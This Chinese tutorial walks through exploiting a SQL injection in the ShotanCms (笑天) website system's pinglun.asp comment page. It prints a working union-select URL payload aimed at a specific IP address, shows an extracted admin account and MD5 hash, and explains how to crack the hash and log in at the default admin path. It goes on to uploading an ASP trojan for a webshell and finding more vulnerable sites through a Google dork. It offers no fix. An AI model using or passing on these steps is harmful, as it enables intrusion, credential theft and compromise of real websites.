笑天网站管理系统漏洞分析利用详解

接下来，我们就对这个网站系统的安全性进行一次检测。

我们打开网站管理系统的评论页面代码。存在漏洞的文件是 pinglun.asp。查看它的源文件，我们发现有以下几行代码：

set rs=server.CreateObject("adodb.recordset")

sql1="select * from St_pl where pltype='"&request("pltab")&"' and plid="&request("id")&" order by time desc"

rs.open sql1,conn,1,1

在上面的第二行代码中，我们看到“pltype=’”$request(“pltab”)&”’ and plid=”&request(“id”)”代码，程序利用Request方法获得从客户端浏览器提交过来的参数pltab和id的值，并存储在pltype和plid这两个字段中。我们可以看到，整个提交过程并未做任何过滤，这样注入漏洞就产生了。

原理讲完了。下面我们就来看看如何进行操作演练了。我们首先要找到一个具有评论的文章（如果没有评论就申请一个帐号发表评论）然后点击右侧的“查看全部评论”按钮如图所示：

 

但是由于程序中的SQL查询已经包含了order by 语句了。所以我们不能在使用order by进行判断字段了。这样我们再回到源码中，打开数据库看一下。如下图：

我们看到 St_pl表中，一共有12个字段。下面我们就可以构造自己的注入语句了。

我们打开刚才的评论测试地址 http://221.195.40.85/pinglun.asp?id=1&pltab=news，为了便于后面的比较，我这里先做一下截图，如下：

 

 把这两次的返回页面做一下比较就可以一目了然了。再到数据库里我们看一下，5的地方代表的是st_news表的title字段，6是content字段，7是date字段。

看明白了这些之后，我们再次提交以下注入语句：http://221.195.40.85/pinglun.asp?id=1%20and%201=2%20union%20select%201,2,3,4,admin_name,admin_pass,id,8,9,10,11,12%20from%20st_admin&pltab=news继续进入注入（也就是分别把上一句话的5更换为了admin_name,6更换为了admin_pass，7更换为了id。再换句话说，就是st_admin表中的管理员ID，用户名，和密码了）。返回结果如下图所示：

 

 

 

大家看到什么了？对！我们已经得到了网站后台的管理员帐号是admin，密码是经过了md5加密的值6BB981871904F0B8123E259113AD429A。我们可以到http://www.cmd5.com进行尝试搜索，或者本地进行暴力破解跑出对方的密码来。接下来要做的就是登陆对方的后台管理系统了。这套系统的默认后台地址是 /admin/admin_login.asp 。把我们刚才得到的管理员帐号和密码输入，就可以登陆到后台了。如下图所示：

然后我们再用普通帐号登陆前台发表一篇内容，附件中上传我们的ASP木马。提交成功后我们就可以利用我们的浏览器打开木马的地址了。

 

至此，我们的Webshell就算到手了。至于后面如何拿到系统权限等问题，就看大家如何来进行利用了。

总结：这个漏洞的利用范围还是比较大的。我们可以到google搜索引擎中进行搜索，关键字可以选择：Power By ShotanCms Ver3.0 。可以看到能找到很多这样的网站利用这套系统。